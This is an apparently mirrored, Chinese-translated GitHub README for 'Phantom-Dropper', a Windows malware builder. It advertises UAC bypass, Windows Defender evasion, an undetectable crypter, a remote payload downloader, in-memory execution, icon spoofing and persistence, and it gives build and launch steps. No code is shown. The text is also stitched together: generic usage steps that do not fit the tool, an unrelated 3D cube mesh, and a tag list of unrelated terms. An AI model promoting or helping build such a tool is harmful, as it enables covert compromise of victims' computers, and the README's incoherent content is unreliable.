Herimnx/Phantom-Dropper-WebBased-Chrome-Bypas-Fud-Runtime-Native

GitHub: Herimnx/Phantom-Dropper-WebBased-Chrome-Bypas-Fud-Runtime-Native

一款具备多种规避能力的恶意载荷生成与加密工具,支持权限提升、杀软绕过及持久化驻留。

Stars: 2 | Forks: 2

Unwind AI

# 什么是 Exe Malware Tool? Exe-UacBypass-Downloader-Crypter 是一款设计用于执行恶意 payload 并规避现代安全措施的高级工具。**UAC Bypass** 通过绕过用户帐户控制提示来实现权限提升。**Defender Evasion** 用于禁用或规避 Windows Defender 的检测。**FUD Crypter** 对 payload 进行加密,使其在扫描和执行期间保持不被发现。**Malware Downloader** 从远程服务器获取额外的 payload。**Runtime Execution** 在内存中解密并运行 payload 以实现隐蔽执行。**Anti-Debugging** 防止安全工具进行分析。**Icon Spoofing** 将可执行文件伪装成合法文件。**Persistence Setup** 确保恶意软件在系统重启后仍然保持活动状态。 ## 媒体 ![photo_2025-04-03_13-47-15](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/22e5fe3990150012.jpg) https://github.com/user-attachments/assets/390b7bf2-655f-46b1-af8a-d04fcf969769 ## 功能特性 * 1 UAC Bypass * 2 Defender Evasion * 3 FUD Crypter * 4 Malware Downloader * 5 Runtime Execution * 6 Anti-Debugging * 7 Icon Spoofing * 8 Persistence Setup

Preview

# 安装说明 1. 下载 Visual Studio 2022 _使用 Git Clone 或者下载项目并解压 rar 文件。然后在此处下载 Visual Studio 2022 [VisualStudio 下载](https://visualstudio.microsoft.com/downloads/)_ ![last1](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/8ab8371b6a150015.png) 2. 或者 ![download](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/a5717b5f8f150016.png) 3. _然后打开 sln(项目解决方案)文件_ ![vsgif](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/58d1e7b862150019.gif) 4. 找到可执行文件 /ProjectName/Bin/Debug/Executable.exe # 如何使用 1. **打开应用程序** - 在您的电脑上找到可执行文件(`.exe`),双击它以启动程序。 2. **选择目标并调整设置** - 从可用选项中选择您想要的目标或任务。 - 自定义任何其他设置(例如:偏好设置、配置)以满足您的需求。 3. **生成安全密码** - 使用内置功能创建一个使用 **SHA-256 算法** 哈希处理的强密码。这可确保您的密码安全且已加密。 4. **开始该过程** - 点击 **“Start” 按钮** 或按 `Ctrl + V` 开始操作。 - 当出现提示时,输入您在上一步中生成的密码。 5. **提供 API Key(如果需要)** - 如果应用程序需要 API Key 才能运行(例如,用于外部服务),请在继续之前转到设置并输入您有效的 API Key。 6. **启动服务器** - 一切配置完成后,启动服务器。等待连接建立。稳定的连接是应用程序正常运行的必要条件。 7. **排除错误(如果有)** - 如果遇到错误,请确保您的系统上已安装以下软件: - **Node.js**:从 [nodejs.org](https://nodejs.org) 下载并安装。 - **Visual Studio Build Tools**:安装这些工具以解决技术问题。 ## 许可证 本项目采用 [MIT 许可证](https://github.com/AvaloniaUI/Avalonia/blob/master/licence.md) 授权。 ``` solid cube_corner facet normal 0.0 -1.0 0.0 outer loop vertex 0.0 0.0 0.0 vertex 1.0 0.0 0.0 vertex 0.0 0.0 1.0 endloop endfacet facet normal 0.0 0.0 -1.0 outer loop vertex 0.0 0.0 0.0 vertex 0.0 1.0 0.0 vertex 1.0 0.0 0.0 endloop endfacet facet normal -1.0 0.0 0.0 outer loop vertex 0.0 0.0 0.0 vertex 0.0 0.0 1.0 vertex 0.0 1.0 0.0 endloop endfacet facet normal 0.577 0.577 0.577 outer loop vertex 1.0 0.0 0.0 vertex 0.0 1.0 0.0 vertex 0.0 0.0 1.0 endloop endfacet endsolid ```

snake

标签:Conpot, C#编程, DNS 反向解析, DOM解析, FUD加壳, .NET开发, Raspberry Pi, RAT客户端, UAC绕过, Visual Studio, Windows安全, 下载器, 互斥体, 免杀技术, 内存执行, 协议分析, 反射注入, 反调试, 图标伪造, 多人体追踪, 恶意软件构建器, 攻击框架, 暴力破解检测, 木马生成器, 权限提升, 汇编代码修改, 私有化部署, 端点可见性, 网络信息收集, 网络安全, 远程控制, 防御规避, 隐私保护